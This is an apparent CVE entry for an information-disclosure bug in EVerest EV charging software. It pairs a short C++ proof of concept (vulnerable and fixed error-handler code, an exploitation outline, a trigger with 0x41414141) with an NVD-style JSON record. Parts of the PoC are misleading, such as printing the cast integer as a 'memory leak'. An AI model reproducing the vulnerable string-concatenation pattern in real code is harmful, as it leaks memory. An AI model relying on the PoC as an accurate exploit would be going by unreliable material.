CVE-2026-23955

// CVE-2026-23955 PoC - Information Disclosure via Integer-String Concatenation // This PoC demonstrates the vulnerability in EVerest's error handling #include <string> #include <iostream> // Vulnerable code pattern (before fix) void vulnerable_error_handler(int error_code) { // This causes pointer arithmetic instead of string concatenation // In C++, "Error: " + error_code interprets error_code as a pointer offset std::string msg = "Error: " + error_code; throw std::runtime_error(msg); } // Safe version (after fix) void safe_error_handler(int error_code) { // Correct way: convert integer to string first std::string msg = "Error: " + std::to_string(error_code); throw std::runtime_error(msg); } // Exploitation scenario: // 1. Attacker needs high privilege access to EV charging system // 2. Trigger error conditions with controlled integer values // 3. Read leaked memory contents from stack/heap // 4. Extract sensitive data from leaked memory regions int main() { std::cout << "CVE-2026-23955 Information Disclosure PoC" << std::endl; std::cout << "Target: EVerest EV Charging Software < 2025.9.0" << std::endl; // Simulate triggering vulnerable code path int malicious_code = 0x41414141; // Controlled value try { vulnerable_error_handler(malicious_code); } catch (const std::exception& e) { std::cout << "Exception: " << e.what() << std::endl; std::cout << "Memory address leak: " << (void*)malicious_code << std::endl; } return 0; }

{"cve": {"id": "CVE-2026-23955", "sourceIdentifier": "[email protected]", "published": "2026-01-21T20:16:12.517", "lastModified": "2026-02-06T21:21:59.107", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "EVerest is an EV charging software stack. Prior to version 2025.9.0, in several places, integer values are concatenated to literal strings when throwing errors. This results in pointers arithmetic instead of printing the integer value as expected, like most of interpreted languages. This can be used by malicious operator to read unintended memory regions, including the heap and the stack. Version 2025.9.0 fixes the issue."}, {"lang": "es", "value": "EVerest es una pila de software de carga de VE. Antes de la versión 2025.9.0, en varios lugares, los valores enteros se concatenan a cadenas literales al lanzar errores. Esto resulta en aritmética de punteros en lugar de imprimir el valor entero como se espera, como la mayoría de los lenguajes interpretados. Esto puede ser utilizado por un operador malicioso para leer regiones de memoria no intencionadas, incluyendo el montón y la pila. La versión 2025.9.0 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N", "baseScore": 4.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.6, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1046"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linuxfoundation:everest:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025.9.0", "matchCriteriaId": "B1D746C7-49D6-43DE-90B2-C79F58ADB9B7"}]}]}], "references": [{"url": "https://github.com/EVerest/everest-core/security/advisories/GHSA-px57-jx97-hrff", "source": "[email protected]", "tags": ["Vendor Advisory", "Exploit"]}]}}